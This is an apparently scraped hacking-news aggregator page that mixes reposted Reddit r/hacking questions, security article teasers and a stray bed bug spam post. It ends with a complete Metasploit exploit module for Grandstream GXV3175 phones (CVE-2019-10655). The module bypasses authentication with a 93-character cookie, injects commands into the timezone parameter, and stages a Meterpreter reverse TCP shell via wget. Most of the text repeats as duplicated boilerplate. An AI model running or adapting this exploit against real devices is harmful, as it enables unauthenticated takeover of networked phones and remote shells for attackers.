Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Red Cross implores hackers not to leak data for 515k “highly vulnerable people”
https://external-preview.redd.it/Fnaz4JV-R5XOfP488gpy_JIgWOa3ABfdy9TBWxvSkhI.jpg?width=640&crop=smart&auto=webp&s=a896db2bacb85be92cbe956501167814c5c7c5f0 submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Red Cross implores hackers not to leak data for 515k “highly vulnerable people”
https://external-preview.redd.it/Fnaz4JV-R5XOfP488gpy_JIgWOa3ABfdy9TBWxvSkhI.jpg?width=640&crop=smart&auto=webp&s=a896db2bacb85be92cbe956501167814c5c7c5f0 submitted by /u/DrinkMoreCodeMore
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Red Cross implores hackers not to leak data for 515k “highly...
Posted in r/hacking by u/DrinkMoreCodeMore • 2 points and 1 comment
hacking: security in practice
Is it possible to replace a file hash with a predefined value?
As the title states, I am looking to see if there is a method or ability to replace a file hash with a predefined value or a way to manually assign it a value? This is for exercise purposes, not for malicious intent. I have never thought about the concept, but was thinking about an idea for an exercise yesterday and figured it was worth looking into.
submitted by /u/DarkJediSkii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is it possible to replace a file hash with a predefined value?
As the title states, I am looking to see if there is a method or ability to replace a file hash with a predefined value or a way to manually assign it a value? This is for exercise purposes, not for malicious intent. I have never thought about the concept, but was thinking about an idea for an exercise yesterday and figured it was worth looking into.
submitted by /u/DarkJediSkii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is it possible to replace a file hash with a predefined value?
As the title states, I am looking to see if there is a method or ability to replace a file hash with a predefined value or a way to manually...
hacking: security in practice
Unlock windows XP pc without password
Hi, I currently have an old windows XP pc at home which I forgot the password and have no way of resetting it. It was a company computer given to my father with the company account on it. I would like to know if there would be a way to unlock it so I can get the family pictures stored on it. My other option would be to remove the hard drive and try to get the files in it by connecting it to another computer but I would prefer trying this option first
submitted by /u/INF_Phoenix
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Unlock windows XP pc without password
Hi, I currently have an old windows XP pc at home which I forgot the password and have no way of resetting it. It was a company computer given to my father with the company account on it. I would like to know if there would be a way to unlock it so I can get the family pictures stored on it. My other option would be to remove the hard drive and try to get the files in it by connecting it to another computer but I would prefer trying this option first
submitted by /u/INF_Phoenix
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Unlock windows XP pc without password
Hi, I currently have an old windows XP pc at home which I forgot the password and have no way of resetting it. It was a company computer given to...
hacking: security in practice
Sabotage/tamper with Wireless cameras?
My parents suddenly installed wireless N20 Laview cameras in some uncomfortable areas, thankfully not my bedroom or bathroom.
I hear one click every single time i leave my room and it makes me very uncomfortable.
Is there a way to sabotage/mess with these cameras? They haven’t even told me about the cameras which makes it worse. Isnt family supposed to be about trust?
submitted by /u/Binokna
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Sabotage/tamper with Wireless cameras?
My parents suddenly installed wireless N20 Laview cameras in some uncomfortable areas, thankfully not my bedroom or bathroom.
I hear one click every single time i leave my room and it makes me very uncomfortable.
Is there a way to sabotage/mess with these cameras? They haven’t even told me about the cameras which makes it worse. Isnt family supposed to be about trust?
submitted by /u/Binokna
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Sabotage/tamper with Wireless cameras?
My parents suddenly installed wireless N20 Laview cameras in some uncomfortable areas, thankfully not my bedroom or bathroom. I hear one click...
hacking: security in practice
Can a USB Mouse become infected with a virus?
I have heard your computer mouse can get infected with a Virus before somewhere.
I don't know if its true but remember reading about a firmware virus infecting a mouse or something.
I am familiar with "Bad USB's" but thats not what I'm refering to.
How could one detect this on a USB mouse?
Would it only be Wireless Mice not corded being affect or both?
submitted by /u/Wind0ze_User
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Can a USB Mouse become infected with a virus?
I have heard your computer mouse can get infected with a Virus before somewhere.
I don't know if its true but remember reading about a firmware virus infecting a mouse or something.
I am familiar with "Bad USB's" but thats not what I'm refering to.
How could one detect this on a USB mouse?
Would it only be Wireless Mice not corded being affect or both?
submitted by /u/Wind0ze_User
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Can a USB Mouse become infected with a virus?
I have heard your computer mouse can get infected with a Virus before somewhere. I don't know if its true but remember reading about a firmware...
hacking: security in practice
Phishing Texts and Calls
I got into a conflict with someone, who is relatively wealthy in the construction field, and then, since that day, I’ve been getting daily phishing texts and spammer ID Theft automated calls.
I live in Canada, and I didn’t know you could employ “hackers” to so such things.
1) How is he able to do that? 2) What should I do about it?
submitted by /u/jzififnyfiv
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Phishing Texts and Calls
I got into a conflict with someone, who is relatively wealthy in the construction field, and then, since that day, I’ve been getting daily phishing texts and spammer ID Theft automated calls.
I live in Canada, and I didn’t know you could employ “hackers” to so such things.
1) How is he able to do that? 2) What should I do about it?
submitted by /u/jzififnyfiv
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Phishing Texts and Calls
I got into a conflict with someone, who is relatively wealthy in the construction field, and then, since that day, I’ve been getting daily...
hacking: security in practice
Hacking my own iPhone
If I want to try hack into my own iPhone to see if I can get into it what is the best software to attempt this?
submitted by /u/Interesting_Stop_935
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacking my own iPhone
If I want to try hack into my own iPhone to see if I can get into it what is the best software to attempt this?
submitted by /u/Interesting_Stop_935
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hacking my own iPhone
If I want to try hack into my own iPhone to see if I can get into it what is the best software to attempt this?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Enterprises Are Sailing Into a Perfect Storm of Cloud Risk
Policy as code and other techniques can help enterprises steer clear of the dangers that have befallen otherwise sophisticated cloud customers.
___________________________
@hacking_Attack
@Hacking_Video
Enterprises Are Sailing Into a Perfect Storm of Cloud Risk
Policy as code and other techniques can help enterprises steer clear of the dangers that have befallen otherwise sophisticated cloud customers.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Enterprises Are Sailing Into a Perfect Storm of Cloud Risk
Policy as code and other techniques can help enterprises steer clear of the dangers that have befallen otherwise sophisticated cloud customers.
Early bed bug stains on sheets
https://medium.com/@ummeh5094/early-bed-bug-stains-on-sheets-f31f28877521?source=rss------bug_bounty-5
Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…Continue reading on Medium » (https://medium.com/@ummeh5094/early-bed-bug-stains-on-sheets-f31f28877521?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@ummeh5094/early-bed-bug-stains-on-sheets-f31f28877521?source=rss------bug_bounty-5
Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…Continue reading on Medium » (https://medium.com/@ummeh5094/early-bed-bug-stains-on-sheets-f31f28877521?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Early bed bug stains on sheets
Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…
Coletando parâmetros com o BURP SUITE!
https://guaxi.medium.com/coletando-par%C3%A2metros-com-o-burp-suite-ae89d1d7fec2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://guaxi.medium.com/coletando-par%C3%A2metros-com-o-burp-suite-ae89d1d7fec2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Coletando parâmetros com o BURP SUITE!
A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…
A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…Continue reading on Medium » (https://guaxi.medium.com/coletando-par%C3%A2metros-com-o-burp-suite-ae89d1d7fec2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Coletando parâmetros com o BURP SUITE!
A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…
Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the…Continue reading on Medium »
Read more...
Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the…Continue reading on Medium »
Read more...
Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting.Continue reading on Medium »
Read more...
Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting.Continue reading on Medium »
Read more...
Early bed bug stains on sheets
Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…Continue reading on Medium »
Read more...
Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…Continue reading on Medium »
Read more...
Coletando parâmetros com o BURP SUITE!
A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…Continue reading on Medium »
Read more...
A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Grandstream GXV3175 Unauthenticated Command Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.
MD5 |
___________________________
@hacking_Attack
@Hacking_Video
Grandstream GXV3175 Unauthenticated Command Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.
MD5 |
d0714d342ba12f124e7b2588f1b2bde6Download ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
'Description' => %q{
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.
A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.
This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
},
'Author' => [
'alhazred', # Command injection vulnerability discovery and exploit
'Brendan Scarvell', # Auth bypass discovery
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' => [
[ 'CVE', '2019-10655' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
},
'DisclosureDate' => '2016-09-01',
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PrependFork' => true,
'MeterpreterTryToFork' => true,
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'CmdStagerFlavor' => %w[wget],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => ''
}
)
if res && res.code == 200 && res.body.to_s.include?('Response=Success')
return CheckCode::Detected('phonecookie authentication bypassed successfully.')
end
CheckCode::Safe
end
def execute_command(cmd, _opts)
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => "`#{cmd}`"
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
end
unless res.body.to_s.include?('Response=Success')
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
end
def exploit
execute_cmdstager(
linemax: 220, # 255 minus URL encoding
background: true
)
end
end Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Grandstream GXV3175 Unauthenticated Command Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.